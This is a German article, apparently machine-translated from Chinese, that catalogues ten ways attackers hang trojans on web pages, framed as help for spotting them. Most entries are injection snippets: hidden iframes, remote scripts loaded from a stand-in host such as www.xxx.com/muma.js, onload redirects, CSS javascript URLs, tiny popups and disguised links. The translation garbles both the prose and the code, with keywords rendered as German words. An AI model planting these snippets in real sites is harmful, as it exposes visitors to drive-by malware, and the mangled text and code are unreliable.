In diesem Artikel erfahren Sie, welche Methoden Bösewichte häufig zum Anhängen von Trojanern an Webseiten verwenden, damit Sie Ihre eigenen Webseiten verhindern können. Solange Sie diese Orte erkennen, die häufig zum Anhängen von Trojanern verwendet werden, ist es einfach, den Standort zu finden der Trojaner.
1: Rahmenhängendes Pferd
<iframe src=address width=0 height=0></iframe>
Sie können bösartige Website-Links unter der Adresse usw. eingeben.
Zweitens: JS-Dateimontage
Solange es sich um eine JS-Datei handelt, kann sie böswillig verändert und somit mit bösartigem Code verknüpft werden. Im Allgemeinen ist es am wahrscheinlichsten, dass JS-Code, auf den die gesamte Website verweist, mit Trojanern verknüpft ist. Zur Erkennung können wir uns das ansehen Links oder unten im JS-Code kombinieren Bösewichte gerne Schadcode mit vielen Leerzeichen oder Wagenrückläufen. Daher sollten Sie prüfen, ob die JS-Codepage absichtlich gestreckt wurde.
Drei: js-Deformationsverschlüsselung
<SCRIPT language=JScript.Encode src=http://www.xxx.com/muma.txt></script>
muma.txt kann in ein beliebiges Suffix geändert werden
Viertens: Körperhängendes Pferd
<body onload=window.location='address';></body>
Fünftens: Verstecktes Aufhängen eines Pferdes
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';
Sechs: Pferd hängt im CSS
Körper {
Hintergrundbild: url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}
Diese Methode ist rücksichtsloser und schwerer zu erkennen.
Sieben:JAJA hängendes Pferd
<SCRIPT-Sprache=Javascript>
window.open (Adresse,,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1);
</script>
Acht: Bildverkleidung
<html>
<iframe src=网马地址 height=0 width=0></iframe>
<img src=Bildadresse></center>
</html>
Neun: Verkleidungsanruf
<frameset rows=444,0 cols=*>
<frame src=Webseite öffnen framborder=no scrolling=auto noresize marginwidth=0margingheight=0>
<frame src=网马地址 frameborder=no scrolling=no noresize marginwidth=0margingheight=0>
</frameset>
Zehn: Fortgeschrittene Täuschung
<a href=http://www.163.com (verwechselt die Verbindungsadresse und zeigt an, dass diese Adresse auf die Trojaner-Adresse verweist) onMouseOver=www_163_com(); return true;> Auf der Seite anzuzeigender Inhalt</a>
<SCRIPT Language=JavaScript>
Funktion www_163_com ()
{
var url=Netto-Pferdeadresse;
open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10, oben=10);
}
</SCRIPT>